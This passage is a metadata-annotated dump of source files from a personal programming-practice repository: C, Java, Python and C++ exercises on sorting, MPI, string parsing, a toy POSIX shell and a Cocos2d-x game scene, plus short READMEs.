s, char *s1) {\n int n = strlen(s);\n for (int i = 0; i < 128; i++) {\n a[i] = 0;\n }\n for (int i = 0; i < n; i++) {\n a[s[i]]++;\n }\n int j = 0;\n for (int i = 0; i < 128; i++) {\n while (a[i] != 0) {\n s1[j] = i;\n a[i]--;\n j++;\n }\n }\n return;\n}\n\nint main() {\n char a[] = \"123456\";\n char *p = sortString(a);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n char *p2 = a;\n sortString2(a, p2);\n for (int i = 0; p[i] != '\\0'; i++) {\n printf(\"%c\", p[i]);\n }\n putchar('\\n');\n return 0;\n}\n" }, { "alpha_fraction": 0.5471698045730591, "alphanum_fraction": 0.5576519966125488, "avg_line_length": 21.20930290222168, "blob_id": "3f618721978c8e13453022e1395da1afd79a340a", "content_id": "21d7ec51c54999030f844553c82009c119bd99d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1044, "license_type": "permissive", "max_line_length": 73, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_scatter.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 与收集(gather)相对应也有一个相反的集合通信操作,\n// 即根进程向所有进程发送缓冲区的数据,称为散发。\n\n#include <mpi.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n int source = 0;\n int *sbuf;\n int rbuf[5];\n int i;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n if (myid == source) {\n sbuf = (int *)malloc(numprocs * 5 * sizeof(int));\n\n for (int i = 0; i < numprocs * 5; i++) {\n sbuf[i] = i;\n }\n }\n\n // int MPI_Scatter(void* sendbuf, int sendcount, MPI_Datatype sendtype,\n // void* recvbuf, int recvcount, MPI_Datatype recvtype,\n // int root, MPI_Comm comm)\n MPI_Scatter(sbuf, 5, MPI_INT,\n rbuf, 5, MPI_INT,\n source, MPI_COMM_WORLD);\n\n printf(\"Now is process %d: \", myid);\n for (i = 0; i < 5; i++) {\n printf(\"array[%d]=%d\\t\", i, rbuf[i]);\n }\n printf(\"\\n\");\n\n MPI_Finalize();\n return 0;\n}" 
}, { "alpha_fraction": 0.5788235068321228, "alphanum_fraction": 0.5952941179275513, "avg_line_length": 20.794872283935547, "blob_id": "a0993606a2def2ebda1feeb8c485d97b7611e5ba", "content_id": "ccbe1eda9e359eaef86017aa92f60085795e742a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 850, "license_type": "permissive", "max_line_length": 85, "num_lines": 39, "path": "/java/projects/algorithms/chapter1/part1/Q21.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n/**\n * Q21\n */\nimport java.util.ArrayList;\nimport java.util.Scanner;\n\npublic class Q21 {\n\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n ArrayList arrayList = new ArrayList<Q21Score>();\n\n while (scanner.hasNext()) {\n String name = \"\";\n int totalScore = 0;\n int getScore = 0;\n\n if (scanner.hasNext())\n name = scanner.next();\n else\n continue;\n if (scanner.hasNextInt())\n totalScore = scanner.nextInt();\n else\n continue;\n if (scanner.hasNextInt())\n getScore = scanner.nextInt();\n else\n continue;\n Q21Score newScore = new Q21Score(name, totalScore, getScore);\n arrayList.add(newScore);\n }\n\n arrayList.stream().forEach(x -> System.out.println(((Q21Score) x).printScore()));\n\n scanner.close();\n }\n\n}" }, { "alpha_fraction": 0.4301270544528961, "alphanum_fraction": 0.45916515588760376, "avg_line_length": 10.702127456665039, "blob_id": "07b98956c38136643e30961a81183507a9f07cd6", "content_id": "2a4fc417c6ff72a2a185bd765b08e00093166fdd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 630, "license_type": "permissive", "max_line_length": 63, "num_lines": 47, "path": "/c/docs/Algorithms.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "---\nlayout: post\ntitle: \"C_Code\"\ndate: 2017-02-01\ntags:\n - Code\n - Algorithm\n - C\n - Todo\ncategories:\n - 
Code\n---\n\n一些常用的算法,C描述\n# C_Code\n\n```C\n#include<stdio.h>\n\n\n\nint com(int m,int n)//m中取n个\n{\n    int i,j,sum=1;\n    for (i=m,j=0;j<n;j++,i--)\n    {\n        sum=sum*i/(j+1);\n    }\n    return sum;\n}\nint main()\n{\n    int i;\n    i=com(5,3);\n    printf(\"%d\",i);\n    return 0;\n}\n\n```\n\n```c\nint GCD(int a, int b) { return (0 == b) ? a :GCD(b,a%b);}\n```\n\n```C\nint getSum(int a, int b) { return !(a)?b:getSum((a&b)<<1,a^b);}\n```\n\n" }, { "alpha_fraction": 0.3111332058906555, "alphanum_fraction": 0.348906546831131, "avg_line_length": 22.395349502563477, "blob_id": "433febcd415e70b610e40b5a3b122ee6390bbaec", "content_id": "a36c59aaf47448f7c937e8eefa2ad923438560ce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1006, "license_type": "permissive", "max_line_length": 59, "num_lines": 43, "path": "/c/hardwork/hardway/count_letter.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <ctype.h>\n\nint countLetters(const char* const str) {\n int i = 0;\n int n = 0;\n while (*(str + i) != '\\0') {\n if ((*(str + i) >= 'A' && *(str + i) <= 'Z') ||\n ((*(str + i) >= 'a') && *(str + i) <= 'z'))\n n++;\n i++;\n }\n return n;\n}\n\nint* count(const char* const s) {\n static int a[15];\n long long i = 0;\n while (*(s + i) != '\\0') {\n if (*(s + i) == '0') a[0]++;\n if (*(s + i) == '1') a[1]++;\n if (*(s + i) == '2') a[2]++;\n if (*(s + i) == '3') a[3]++;\n if (*(s + i) == '4') a[4]++;\n if (*(s + i) == '5') a[5]++;\n if (*(s + i) == '6') a[6]++;\n if (*(s + i) == '7') a[7]++;\n if (*(s + i) == '8') a[8]++;\n if (*(s + i) == '9') a[9]++;\n i++;\n }\n return a;\n}\n\nint main() {\n char list[] = {'a', 'b', 'a', 'c', '\\0', 'a'};\n int i = countLetters(list);\n char a[] = {'1', '2', '2', '\\0', '3', 'A', 'B', '3'};\n\n int* counts = count(a);\n for (int i = 0; i < 2 * 5; i++) printf(\"%d \", counts[i]);\n return 0;\n}\n" }, { 
"alpha_fraction": 0.5042253732681274, "alphanum_fraction": 0.5323943495750427, "avg_line_length": 16.75, "blob_id": "8fff8d888ef6c3e6c4ceab1c328d23a0fc9b3bec", "content_id": "657118eaac17695e8e58d36d0f81f2571c2ad7f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 355, "license_type": "permissive", "max_line_length": 49, "num_lines": 20, "path": "/c/hardwork/hardway/bin_to_dec.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <string.h> // for strlen()\n\nint parseBinary(const char* const binaryString) {\n int i = 0;\n\n int ans = 0;\n while (*(binaryString + i) != '\\0') {\n ans *= 2;\n ans += ((*(binaryString + i)) - 48);\n i++;\n }\n return ans;\n}\n\nint main() {\n char a[] = \"111\";\n printf(\"%d\", parseBinary(a));\n return 0;\n}\n" }, { "alpha_fraction": 0.48896434903144836, "alphanum_fraction": 0.6146010160446167, "avg_line_length": 31.72222137451172, "blob_id": "4a8d94ffd0295f64832fc14f4ae25be3c6d42cd6", "content_id": "da41c48cb3c7b3b0abd412075bf46b302bfce9fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 589, "license_type": "permissive", "max_line_length": 95, "num_lines": 18, "path": "/c/hardwork/library/stdlib/strtoll.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> /* printf, NULL */\n#include <stdlib.h> /* strtoll */\n\nint main ()\n{\n char szNumbers[] = \"1856892505 17b00a12b -01100011010110000010001101100 0x6fffff 19\";\n char* pEnd;\n long long int lli1, lli2, lli3, lli4, lli5;\n lli1 = strtoll (szNumbers, &pEnd, 10);\n printf(\"|%c|\", pEnd[0]);\n lli2 = strtoll (pEnd, &pEnd, 16);\n lli3 = strtoll (pEnd, &pEnd, 2);\n lli4 = strtoll (pEnd, &pEnd, 0);\n lli5 = strtoll (pEnd, &pEnd, 8);\n printf(\"|%10s|\", pEnd);\n printf (\"The decimal equivalents are: %lld, %lld, %lld and %lld.\\n\", lli1, lli2, lli3, lli4);\n 
return 0;\n}\n" }, { "alpha_fraction": 0.3325892984867096, "alphanum_fraction": 0.3660714328289032, "avg_line_length": 17.285715103149414, "blob_id": "eb74870da6d76f4728b2cd9b6e2f4f61b094b653", "content_id": "5c9d0de8a7019be8209a3ff5fcfcd210205cdc26", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 896, "license_type": "permissive", "max_line_length": 55, "num_lines": 49, "path": "/c/hardwork/hardway/gcd.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint gcd(int a, int b) {\n if (b == 0)\n return a;\n else\n gcd(b, a % b);\n}\n\nint main() {\n struct ans {\n int left;\n int right;\n float x;\n } a[10000];\n\n int N;\n scanf(\"%d\", &N);\n int k = 0;\n for (int i = 1; i <= N; i++) {\n for (int j = 1; j <= N; j++) {\n if (gcd(i, j) == 1) {\n if (i < j) {\n a[k].left = i;\n a[k].right = j;\n a[k].x = (float)i / j;\n k++;\n }\n }\n }\n }\n int temp, num[10000] = {0};\n for (int i = 0; i < k; i++) num[i] = i;\n for (int i = 0; i < k - 1; i++) {\n for (int j = 0; j < k - 1; j++) {\n if (a[num[j]].x > a[num[j + 1]].x) {\n temp = num[j];\n num[j] = num[j + 1];\n num[j + 1] = temp;\n }\n }\n }\n\n printf(\"0/1\\n\");\n for (int i = 0; i < k; i++)\n printf(\"%d/%d\\n\", a[num[i]].left, a[num[i]].right);\n printf(\"1/1\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.35685884952545166, "alphanum_fraction": 0.416500985622406, "avg_line_length": 35.25925827026367, "blob_id": "5e9ca82370719f8d0817dcf14f392d5c33c51358", "content_id": "87e3eaa20f290c4500e1057bc8aae78b30cff4a7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1006, "license_type": "permissive", "max_line_length": 68, "num_lines": 27, "path": "/python36/projects/money-and-computer/main.py", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "TABLE = [\r\n \"Name \", \"Price(k) \", \"Time(y) \", \"Current \",\r\n \"Laptop \", 
\"14 \", \"4+ \", \"MacBook Pro \",\r\n \"Phone \", \"8 \", \"3+ \", \"MI MIX 2S \",\r\n \"Console \", \"12 \", \"8+ \", \"PlayStation4 / Switch \",\r\n \"Monitor \", \"5 \", \"5+ \", \"Dell U2515h \",\r\n \"PC \", \"8 \", \"5+ \", \"I5 16G 256SSD GTX750Ti \",\r\n \"Tablet \", \"5 \", \"4+ \", \"Surface Pro 3 \"]\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Money and Computer\")\r\n\r\n # # too stupid some how\r\n # for i in range(1, len(TABLE) // 4):\r\n # pass\r\n\r\n result = [int(i[0]) / (int(i[1][::-1]) * 12)\r\n for i in zip(TABLE[1 + 4::4], TABLE[2 + 4::4])]\r\n\r\n def print_line(x, y): return print(\r\n (\"{}| \" * 5)[:-2].format(*(x[0:3] + [y] + x[3:4])))\r\n\r\n print_line(TABLE[0:5], \"Pay \")\r\n for x in range(len(result)):\r\n print_line(TABLE[0+4*(x+1):5+4*(x+1)], str(result[x])[:4] + \" \")\r\n\r\n print(\"each month pay total: <{:0.2}k> (k/m)\".format(sum(result)))\r\n" }, { "alpha_fraction": 0.6707503795623779, "alphanum_fraction": 0.6766571998596191, "avg_line_length": 30.96503448486328, "blob_id": "bb6a731cb57f443701b8f04b4f72fe4d8e4f3f8c", "content_id": "c319476275b2e752ad6924fe5326948c1677a828", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 4579, "license_type": "permissive", "max_line_length": 80, "num_lines": 143, "path": "/c/projects/POSIX/Lab1/4.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for puts(), printf(), feof()\n#include <stdlib.h> // for no warn about wait()\n#include <string.h> // for strtok(), strlen()\n#include <unistd.h> // for fork(), wait()\n\n#define MAX_LINE 80\n#define HISTORY_SIZE 10\n#define HELP_MESSAGE \"sh: \"\n\n// store history \nstruct {\n char history[HISTORY_SIZE][MAX_LINE];\n int begin;\n int size;\n} data;\n\n// print history\nvoid printHistory() {\n puts(\"\");\n int i = 0;\n for (; i < data.size; i++) {\n int index = (data.begin + i) % HISTORY_SIZE;\n printf(\"%s\", data.history[index]);\n 
}\n}\n\n// add history\nvoid addHistory(char *str) {\n int index = (data.begin + data.size) % HISTORY_SIZE;\n strcpy(data.history[index], str);\n if (data.size == HISTORY_SIZE) {\n data.begin = (data.begin + 1) % HISTORY_SIZE;\n } else {\n data.size++;\n }\n}\n\n// pricess signal, not kill process\nvoid process_signal(int sign_num) {\n printHistory();\n}\n\n//most inportant set up function\nvoid setup(char inputBuffer[], char *args[], int *background) {\n // read input \n fgets(inputBuffer, MAX_LINE, stdin);\n // process EOF and skip empty line\n if (feof(stdin)) exit(0);\n if (inputBuffer[0] == '\\n' && strlen(inputBuffer) == 1) return;\n // add history\n addHistory(inputBuffer);\n // slice input to args \n // attention please! only one white char in allowed between two args\n char *pch = strtok(inputBuffer, \" \\t\\n\");\n int i = 0;\n for (; pch != NULL; i++) {\n args[i] = pch;\n // printf(\"|%s|\",args[i]);\n pch = strtok(NULL, \" \\n\");\n }\n // check background or not \n *background = (int)(strcmp(args[i - 1], \"&\") == 0);\n // printf(\"%d\", *background);\n if (*background) args[i - 1] = NULL;\n \n int pid = fork();\n if (pid == 0) execvp(args[0], args);\n // if not background, wait it finished\n if (*background != 1) wait(NULL);\n}\n\n// mian func like book example\nint main() {\n signal(SIGINT, process_signal);\n\n char inputBuffer[MAX_LINE];\n int background;\n char *args[MAX_LINE / 2 + 1];\n\n while (1) {\n background = 0;\n printf(\"%s\", HELP_MESSAGE);\n // print stdout buffer \n fflush(stdout);\n \n setup(inputBuffer, args, &background);\n }\n}\n\n// about exec\n// \n// \n// C language prototypes\n// The POSIX standard declares exec functions in the unistd.h header file, in C\n// language. 
The same functions are declared in process.h for DOS (see below),\n// OS/2, and Microsoft Windows.\n\n// int execl(char const *path, char const *arg0, ...);\n// int execle(char const *path, char const *arg0, ..., char const *envp[]);\n// int execlp(char const *file, char const *arg0, ...);\n// int execv(char const *path, char const *argv[]);\n// int execve(char const *path, char const *argv[], char const *envp[]);\n// int execvp(char const *file, char const *argv[]);\n// Some implementations provide these functions named with a leading underscore\n// (e.g. _execl).\n\n// The base of each is exec (execute), followed by one or more letters:\n\n// e – An array of pointers to environment variables is explicitly passed to the\n// new process image.\n// l – Command-line arguments are passed individually (a list) to the function.\n// p – Uses the PATH environment variable to find the file named in the file\n// argument to be executed.\n// v – Command-line arguments are passed to the function as an array (vector) of\n// pointers.\n// path\n// The argument specifies the path name of the file to execute as the new\n// process image. Arguments beginning at arg0 are pointers to arguments to be\n// passed to the new process image. The argv value is an array of pointers to\n// arguments.\n\n// arg0\n// The first argument arg0 should be the name of the executable file. Usually it\n// is the same value as the path argument. Some programs may incorrectly rely on\n// this argument providing the location of the executable, but there is no\n// guarantee of this nor is it standardized across platforms.\n\n// envp\n// Argument envp is an array of pointers to environment settings. The exec calls\n// named ending with an e alter the environment for the new process image by\n// passing a list of environment settings through the envp argument. 
This\n// argument is an array of character pointers; each element (except for the\n// final element) points to a null-terminated string defining an environment\n// variable.\n\n// Each null-terminated string has the form:\n\n// name=value\n// where name is the environment variable name, and value is the value of that\n// variable. The final element of the envp array must be null.\n\n// In the execl, execlp, execv, and execvp calls, the new process image inherits\n// the current environment variables.\n" }, { "alpha_fraction": 0.7215189933776855, "alphanum_fraction": 0.75443035364151, "avg_line_length": 35, "blob_id": "c0a2cab2964b397d6077fed7e4be5e62365c7a23", "content_id": "8f96ec9682ee6e264984fbf3d9b3a3a35019d1fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 395, "license_type": "permissive", "max_line_length": 255, "num_lines": 11, "path": "/java/hardwork/junit/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Junit\n`jskyzero` `2017/12/31`\n\n## Overview\n\nJUnit is a unit testing framework for the Java programming language. JUnit has been important in the development of test-driven development, and is one of a family of unit testing frameworks which is collectively known as xUnit that originated with SUnit.\n\n## Install && Run\n1. download `junit-4.9.jar` to this folder\n2. `chmod a+x test`\n3. 
`./test`" }, { "alpha_fraction": 0.3786407709121704, "alphanum_fraction": 0.4223301112651825, "avg_line_length": 17.727272033691406, "blob_id": "b291c3a441ae820fc4eea9f83c06d465674981b1", "content_id": "9a8711077776033e6ffbc3adf0b6ee6db7af071f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 206, "license_type": "permissive", "max_line_length": 34, "num_lines": 11, "path": "/c/hardwork/hardway/mod_by_five.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n\nint main() {\n int a[5] = {1, 2, 3, 4, 5};\n int i;\n for (i = 0; i < 5; i++)\n if ((char)a[i] == '5')\n printf(\"%d\\n\", a[i]);\n else\n printf(\"FAILED\\n\");\n}\n" }, { "alpha_fraction": 0.6953316926956177, "alphanum_fraction": 0.6953316926956177, "avg_line_length": 19.350000381469727, "blob_id": "69068bf370a07e0fbfa456bef2485b6678304340", "content_id": "475d19c89658374567e680d9cc4db99225cb0233", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 407, "license_type": "permissive", "max_line_length": 73, "num_lines": 20, "path": "/c/projects/sniff/capture.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef __CAPTURE_H\n#define __CAPTURE_H\n\n#include <arpa/inet.h>\n#include <errno.h>\n#include <netinet/if_ether.h>\n#include <netinet/in.h>\n#include <netinet/ip.h>\n#include <pcap.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/socket.h>\n#include <time.h>\n\n#include <buffer.h>\n\n/* callback foo for the capture library */\nvoid pcap_callback(u_char *, const struct pcap_pkthdr *, const u_char *);\n\n#endif\n" }, { "alpha_fraction": 0.5130513310432434, "alphanum_fraction": 0.522652268409729, "avg_line_length": 24.450382232666016, "blob_id": "201420bcc304c8f6ddbce8c2e4a9b4629072cd47", "content_id": "ae61373bc0acac23af25fd5f5e8682eaa8e18ad2", "detected_licenses": [ "MIT" ], "is_generated": false, 
"is_vendor": false, "language": "Java", "length_bytes": 3333, "license_type": "permissive", "max_line_length": 124, "num_lines": 131, "path": "/java/projects/algorithms/chapter1/part1/Q33Matrix.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "import java.util.stream.IntStream;\n\n/**\n * Q33Matrix\n */\n\npublic class Q33Matrix {\n\n public static double dot(double[] x, double[] y) {\n return IntStream.range(0, Math.min(x.length, y.length)).mapToDouble(i -> x[i] * y[i]).sum();\n }\n\n public static double[][] mult(double[][] x, double[][] y) {\n int m = x.length, n = y[0].length;\n double[][] result = new double[m][n];\n\n for (int i = 0; i < m; i++) {\n for (int j = 0; j < n; j++) {\n final int colIndex = j;\n double[] col = IntStream.range(0, y.length).mapToDouble(rowIndex -> y[rowIndex][colIndex]).toArray();\n result[i][j] = dot(x[i], col);\n }\n }\n\n return result;\n }\n\n public static double[][] transpose(double[][] a) {\n int m = a.length, n = a[0].length;\n double[][] result = new double[n][m];\n\n for (int i = 0; i < m; i++) {\n for (int j = 0; j < n; j++) {\n result[j][i] = a[n - 1 - j][m - 1 - i];\n }\n }\n return result;\n }\n\n public static double[] mult(double[][] a, double[] x) {\n int m = a.length, n = Math.min(a[0].length, x.length);\n double[] result = new double[m];\n for (int i = 0; i < m; i++) {\n result[i] = dot(a[i], x);\n }\n return result;\n }\n\n public static double[] mult(double[] x, double[][] a) {\n int m = Math.min(a.length, x.length), n = a[0].length;\n double[] result = new double[n];\n for (int i = 0; i < n; i++) {\n final int colIndex = i;\n double[] col = IntStream.range(0, m).mapToDouble(rowIndex -> a[rowIndex][colIndex]).toArray();\n result[i] = dot(x, col);\n }\n return result;\n }\n\n public static void print(double[][] matrix) {\n int m = matrix.length, n = matrix[0].length;\n for (int i = 0; i < m; i++) {\n for (int j = 0; j < n; j++) {\n System.out.printf(\"%5f \", matrix[i][j]);\n }\n 
System.out.println();\n }\n }\n\n public static void print(double[] array) {\n IntStream.range(0, array.length).forEach(i -> System.out.printf(\"%5f%s\", array[i], i + 1 == array.length ? \"\\n\" : \" \"));\n }\n}\n\n// bellow is a test example, but in fact don't need to be such complex\n// make things simple please\n\n// \n// import java.io.ByteArrayOutputStream;\n// import java.io.IOException;\n// import java.util.ArrayList;\n\n// public class Q33Matrix<T> {\n// private int m, n;\n// private ArrayList data;\n// // m * n\n\n// public Q33Matrix(int m, int n) {\n// this.m = m;\n// this.n = n;\n\n// data = new ArrayList<T>(size());\n// System.out.print(size());\n// System.out.print(data.size());\n// }\n\n// public T get(int m, int n) {\n// return (T) data.get(index(m, n));\n// }\n\n// public int rowSize() {\n// return m;\n// }\n\n// public int colSize() {\n// return n;\n// }\n\n// public int size() {\n// return m * n;\n// }\n\n// private int index(int raw, int col) {\n// return raw * colSize() + col;\n// }\n\n// public String toString() {\n// try {\n// ByteArrayOutputStream out = new ByteArrayOutputStream();\n// for (int i = 0; i < m; i++) {\n// for (int j = 0; j < n; j++) {\n// out.write(String.format(\"%s\\n\", get(i, j).toString()).getBytes());\n// }\n// out.write(\"\\n\".getBytes());\n// }\n// return new String(out.toByteArray());\n// } catch (IOException e) {\n// return e.toString();\n// }\n// }\n// }" }, { "alpha_fraction": 0.5306586027145386, "alphanum_fraction": 0.5488266348838806, "avg_line_length": 28.35555648803711, "blob_id": "f1486d82aa1861120a6979edf0721ddd554e27b5", "content_id": "cc91c0eb93768b177f22e9babae3ccd76e37de06", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1321, "license_type": "permissive", "max_line_length": 76, "num_lines": 45, "path": "/java/projects/algorithms/chapter1/part1/Q23.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n/**\n * Q23\n 
*/\n\nimport java.util.Scanner;\nimport java.util.Arrays;\n\n\npublic class Q23 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n\n if (scanner.hasNextInt()) {\n int arraySize = scanner.nextInt();\n int[] array = new int[arraySize];\n for (int i = 0; i < arraySize && scanner.hasNextInt(); i++)\n array[i] = scanner.nextInt();\n Arrays.sort(array);\n if (scanner.hasNext()) {\n boolean printIn = scanner.next().charAt(0) == '+';\n if (scanner.hasNextInt()) {\n int key = scanner.nextInt();\n int findResult = rank(key, array);\n if ((printIn && findResult >= 0) ||\n (!printIn && findResult <0))\n System.out.printf(\"key: %-10d index: %-10d\\n\", key, findResult);\n }\n }\n }\n scanner.close();\n }\n\n public static int rank(int key, int[] a) {\n return rank(key, a, 0, a.length - 1, 0);\n }\n\n public static int rank(int key, int[] a, int lo, int hi, int deepth) {\n if (lo > hi) return -1;\n System.out.printf(\"low: %-5d high:%-5d deepth:%-5d\\n\", lo, hi, deepth);\n int mid = lo + (hi - lo) / 2;\n if (key < a[mid]) return rank(key, a, lo, mid - 1, deepth + 1);\n else if (key > a[mid]) return rank(key, a, mid + 1, hi, deepth + 1);\n else return mid;\n }\n}" }, { "alpha_fraction": 0.593406617641449, "alphanum_fraction": 0.651098906993866, "avg_line_length": 20.41176414489746, "blob_id": "4eef0af408d5a9588999102c5e49790e5037327a", "content_id": "346042498b76371f252f0031a56a6cc1a68dd34e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "permissive", "max_line_length": 80, "num_lines": 17, "path": "/c/projects/POSIX/Lab2/2.1.cal_size.py", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\"\"\" cal_size.py\ncalcute the size n that cause fibonacci array value more than 4byte signed value\n\"\"\"\nVALUE = 1 << 31\nprint \"VALUE =\", VALUE\n\nsize, value = 1, 1\nleft, right = (0, 1)\n\nwhile value < VALUE:\n print size, value\n size = 
size + 1\n value = left + right\n left = right\n right = value\n\n# we can get that 48 value that will more than 2147483648\n" }, { "alpha_fraction": 0.48134326934814453, "alphanum_fraction": 0.49720150232315063, "avg_line_length": 23.571428298950195, "blob_id": "d06e74bf09b7da29a661a27ec55e1bfbb44028eb", "content_id": "ba7a782ce780453e980832ccf7689f60103df05d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1072, "license_type": "permissive", "max_line_length": 75, "num_lines": 42, "path": "/c/hardwork/tips/function_pointer.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint int_cmp(void const *left, void const *right) {\r\n return (*(int const *)left) - (*(int const *)right);\r\n}\r\n\r\nvoid int_swap(int *const left, int *const right) {\r\n if (*left != *right) {\r\n *left = *left + *right;\r\n *right = *left - *right;\r\n *left = *left - *right;\r\n }\r\n}\r\n\r\nvoid int_qsort(int *begin, int *end,\r\n int (*cmp_func)(void const *, void const *)) {\r\n int select_value = *begin;\r\n int i = 0;\r\n int j = (end - begin) - 1;\r\n\r\n while (i <= j) {\r\n while ((*cmp_func)(begin + i, &select_value) < 0) i++;\r\n while ((*cmp_func)(begin + j, &select_value) > 0) j--;\r\n if (i <= j) {\r\n int_swap(begin + i, begin + j);\r\n i++;\r\n j--;\r\n }\r\n }\r\n if (begin < begin + j) int_qsort(begin, begin + j + 1, cmp_func);\r\n if (begin + i < end - 1) int_qsort(begin + i, end, cmp_func);\r\n}\r\n\r\nint main() {\r\n int array[] = {4, 6, 7, 2, 1, 5, 3};\r\n int_qsort(array, array + 7, int_cmp);\r\n\r\n for (int i = 0; i < 7; i++) printf(\"index: %d value: %d\\n\", i, array[i]);\r\n\r\n return 0;\r\n}" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.71875, "avg_line_length": 15.5, "blob_id": "827fc6afe8bec8f4cb9eab6be19ac78b396197b0", "content_id": "d5f85b024acabe8cb5ebe36861bb27f63adf9908", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 32, "license_type": "permissive", "max_line_length": 17, "num_lines": 2, "path": "/R/harwork/packages/fun/tower_of_hanoi.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "library(\"fun\")\ntower_of_hanoi(3)" }, { "alpha_fraction": 0.6474885940551758, "alphanum_fraction": 0.6577625274658203, "avg_line_length": 28.795917510986328, "blob_id": "3cf98d3b3ac712782c33e0c6809c5b80fe88c957", "content_id": "9603c3afd2089cb04b23ee4f5d2d2008a9c2fe63", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4464, "license_type": "permissive", "max_line_length": 86, "num_lines": 147, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week15/Classes/GameScene.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "GB18030", "text": "#pragma execution_character_set(\"UTF-8\")\n#include \"GameScene.h\"\n#include \"json/rapidjson.h\"\n#include \"json/document.h\"\n#include \"json/writer.h\"\n#include \"json/stringbuffer.h\"\n#include <regex>\nusing std::regex;\nusing std::match_results;\nusing std::regex_match;\nusing std::cmatch;\nusing namespace rapidjson;\n\nUSING_NS_CC;\n\ncocos2d::Scene* GameScene::createScene() {\n\t// 'scene' is an autorelease object\n\tauto scene = Scene::create();\n\n\t// 'layer' is an autorelease object\n\tauto layer = GameScene::create();\n\n\t// add layer as a child to scene\n\tscene->addChild(layer);\n\n\t// return the scene\n\treturn scene;\n}\n\nbool GameScene::init() {\n\tif (!Layer::init())\n\t{\n\t\treturn false;\n\t}\n\n\tSize size = Director::getInstance()->getVisibleSize();\n\tvisibleHeight = size.height;\n\tvisibleWidth = size.width;\n\n\tscore_field = TextField::create(\"Score\", \"Arial\", 30);\n\tscore_field->setPosition(Size(visibleWidth / 4, visibleHeight / 4 * 3));\n\tthis->addChild(score_field, 2);\n\n\tsubmit_button = 
Button::create();\n\tsubmit_button->setTitleText(\"Submit\");\n\tsubmit_button->setTitleFontSize(30);\n\tsubmit_button->setPosition(Size(visibleWidth / 4, visibleHeight / 4));\n\tthis->addChild(submit_button, 2);\n\n\trank_field = TextField::create(\"\", \"Arial\", 30);\n\trank_field->setPosition(Size(visibleWidth / 4 * 3, visibleHeight / 4 * 3));\n\tthis->addChild(rank_field, 2);\n\n\trank_button = Button::create();\n\trank_button->setTitleText(\"Rank\");\n\trank_button->setTitleFontSize(30);\n\trank_button->setPosition(Size(visibleWidth / 4 * 3, visibleHeight / 4));\n\tthis->addChild(rank_button, 2);\n\n\tsubmit_button->addClickEventListener([&](Ref* sender) {\n\t\tauto score_str = score_field->getStringValue();\n\t\tif (score_str.empty()) return;\n\t\tif (CCString::create(score_str)->intValue() > 0)\n\t\t{\n\t\t\tauto request = new HttpRequest();\n\t\t\tauto postData = \"score=\" + score_str;\n\n\t\t\tvector<string> 